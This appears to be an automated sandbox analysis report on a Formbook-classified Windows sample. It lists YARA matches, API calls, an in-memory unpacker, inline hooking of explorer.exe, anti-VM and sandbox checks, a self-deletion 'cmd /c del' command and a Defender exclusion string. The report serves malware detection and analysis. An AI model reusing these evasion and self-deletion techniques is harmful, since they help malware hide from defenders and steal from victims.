          Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02AFB150 appears 45 times
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419D50 NtCreateFile,4_2_00419D50
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419E00 NtReadFile,4_2_00419E00
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419E80 NtClose,4_2_00419E80
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419F30 NtAllocateVirtualMemory,4_2_00419F30
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419D4B NtCreateFile,4_2_00419D4B
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419E7A NtClose,4_2_00419E7A
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00419F2D NtAllocateVirtualMemory,4_2_00419F2D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39A50 NtCreateFile,LdrInitializeThunk,11_2_02B39A50
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39860 NtQuerySystemInformation,LdrInitializeThunk,11_2_02B39860
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39840 NtDelayExecution,LdrInitializeThunk,11_2_02B39840
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B399A0 NtCreateSection,LdrInitializeThunk,11_2_02B399A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_02B39910
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B396E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_02B396E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B396D0 NtCreateKey,LdrInitializeThunk,11_2_02B396D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_02B39660
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39650 NtQueryValueKey,LdrInitializeThunk,11_2_02B39650
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39780 NtMapViewOfSection,LdrInitializeThunk,11_2_02B39780
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39FE0 NtCreateMutant,LdrInitializeThunk,11_2_02B39FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39710 NtQueryInformationToken,LdrInitializeThunk,11_2_02B39710
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B395D0 NtClose,LdrInitializeThunk,11_2_02B395D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39540 NtReadFile,LdrInitializeThunk,11_2_02B39540
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39A80 NtOpenDirectoryObject,11_2_02B39A80
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39A20 NtResumeThread,11_2_02B39A20
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39A10 NtQuerySection,11_2_02B39A10
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39A00 NtProtectVirtualMemory,11_2_02B39A00
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3A3B0 NtGetContextThread,11_2_02B3A3B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39B00 NtSetValueKey,11_2_02B39B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B398A0 NtWriteVirtualMemory,11_2_02B398A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B398F0 NtReadVirtualMemory,11_2_02B398F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39820 NtEnumerateKey,11_2_02B39820
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3B040 NtSuspendThread,11_2_02B3B040
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B399D0 NtCreateProcessEx,11_2_02B399D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39950 NtQueueApcThread,11_2_02B39950
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39610 NtEnumerateValueKey,11_2_02B39610
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39670 NtQueryInformationProcess,11_2_02B39670
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B397A0 NtUnmapViewOfSection,11_2_02B397A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39730 NtQueryVirtualMemory,11_2_02B39730
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3A710 NtOpenProcessToken,11_2_02B3A710
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3A770 NtOpenThread,11_2_02B3A770
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39770 NtSetInformationFile,11_2_02B39770
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39760 NtOpenProcess,11_2_02B39760
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B395F0 NtQueryInformationFile,11_2_02B395F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3AD30 NtSetContextThread,11_2_02B3AD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39520 NtWaitForSingleObject,11_2_02B39520
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B39560 NtWriteFile,11_2_02B39560
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499D50 NtCreateFile,11_2_00499D50
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499E00 NtReadFile,11_2_00499E00
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499E80 NtClose,11_2_00499E80
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499F30 NtAllocateVirtualMemory,11_2_00499F30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499D4B NtCreateFile,11_2_00499D4B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499E7A NtClose,11_2_00499E7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00499F2D NtAllocateVirtualMemory,11_2_00499F2D
          Source: VJaX7U6LAp.exe, 00000000.00000002.361346330.00000000001C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSharedI.exe< vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000000.00000002.361662121.000000000086A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000003.00000000.356091448.00000000002A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSharedI.exe< vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000004.00000000.359914175.0000000000BC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSharedI.exe< vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000004.00000002.428318284.000000000165F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe, 00000004.00000002.428794931.0000000001914000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exeBinary or memory string: OriginalFilenameSharedI.exe< vs VJaX7U6LAp.exe
          Source: VJaX7U6LAp.exe Virustotal: Detection: 10%
          Source: VJaX7U6LAp.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\VJaX7U6LAp.exe 'C:\Users\user\Desktop\VJaX7U6LAp.exe'
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe Process created: C:\Users\user\Desktop\VJaX7U6LAp.exe C:\Users\user\Desktop\VJaX7U6LAp.exe
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe Process created: C:\Users\user\Desktop\VJaX7U6LAp.exe C:\Users\user\Desktop\VJaX7U6LAp.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VJaX7U6LAp.exe.log
          Source: classification engine Classification label: mal100.troj.evad.winEXE@9/1@4/0
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: VJaX7U6LAp.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: VJaX7U6LAp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: VJaX7U6LAp.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: VJaX7U6LAp.exe, 00000004.00000002.428318284.000000000165F000.00000040.00000001.sdmp, help.exe, 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: VJaX7U6LAp.exe, 00000004.00000002.428318284.000000000165F000.00000040.00000001.sdmp, help.exe
          Source: Binary string: help.pdbGCTL source: VJaX7U6LAp.exe, 00000004.00000002.428786931.0000000001910000.00000040.00020000.sdmp
          Source: Binary string: help.pdb source: VJaX7U6LAp.exe, 00000004.00000002.428786931.0000000001910000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: VJaX7U6LAp.exe, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.VJaX7U6LAp.exe.140000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.VJaX7U6LAp.exe.140000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.VJaX7U6LAp.exe.220000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.VJaX7U6LAp.exe.220000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.VJaX7U6LAp.exe.220000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.VJaX7U6LAp.exe.220000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.VJaX7U6LAp.exe.220000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.5.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.7.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.9.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.VJaX7U6LAp.exe.b40000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 0_2_00148F06 push cs; ret 0_2_00148F07
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00401026 push ebp; ret 4_2_00401027
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_004170A5 push esp; ret 4_2_004170A7
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041713B push cs; ret 4_2_0041713C
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041D1E3 pushfd ; retf 4_2_0041D1F3
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_004165D6 push ebx; ret 4_2_004165D7
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041CEF2 push eax; ret 4_2_0041CEF8
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041CEFB push eax; ret 4_2_0041CF62
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041CEA5 push eax; ret 4_2_0041CEF8
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041CF5C push eax; ret 4_2_0041CF62
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B4D0D1 push ecx; ret 11_2_02B4D0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004970A5 push esp; ret 11_2_004970A7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049713B push cs; ret 11_2_0049713C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049D1E3 pushfd ; retf 11_2_0049D1F3
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049D9AF push cs; iretd 11_2_0049D9B2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004965D6 push ebx; ret 11_2_004965D7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049CEFB push eax; ret 11_2_0049CF62
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049CEF2 push eax; ret 11_2_0049CEF8
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049CEA5 push eax; ret 11_2_0049CEF8
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049CF5C push eax; ret 11_2_0049CF62

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE0
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\help.exe Process created: /c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe'
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 0.2.VJaX7U6LAp.exe.269d120.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: VJaX7U6LAp.exe PID: 6316, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000004898E4 second address: 00000000004898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 0000000000489B4E second address: 0000000000489B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe TID: 4756 Thread sleep time: -39557s >= -30000s
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe TID: 5112 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6196 Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 5536 Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe Code function: 4_2_00409A80 rdtsc 4_2_00409A80
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe Thread delayed: delay time: 39557
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.372623370.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.393924911.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.368004715.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.393924911.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.372313335.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000006.00000000.372313335.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000006.00000000.372623370.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.399795242.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_02B0AAB0 mov eax, dword ptr fs:[00000030h] 11_2_02B0AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76C0A mov eax, dword ptr fs:[00000030h]11_2_02B76C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76C0A mov eax, dword ptr fs:[00000030h]11_2_02B76C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76C0A mov eax, dword ptr fs:[00000030h]11_2_02B76C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76C0A mov eax, dword ptr fs:[00000030h]11_2_02B76C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1746D mov eax, dword ptr fs:[00000030h]11_2_02B1746D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8C450 mov eax, dword ptr fs:[00000030h]11_2_02B8C450
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8C450 mov eax, dword ptr fs:[00000030h]11_2_02B8C450
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2A44B mov eax, dword ptr fs:[00000030h]11_2_02B2A44B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B21DB5 mov eax, dword ptr fs:[00000030h]11_2_02B21DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B21DB5 mov eax, dword ptr fs:[00000030h]11_2_02B21DB5
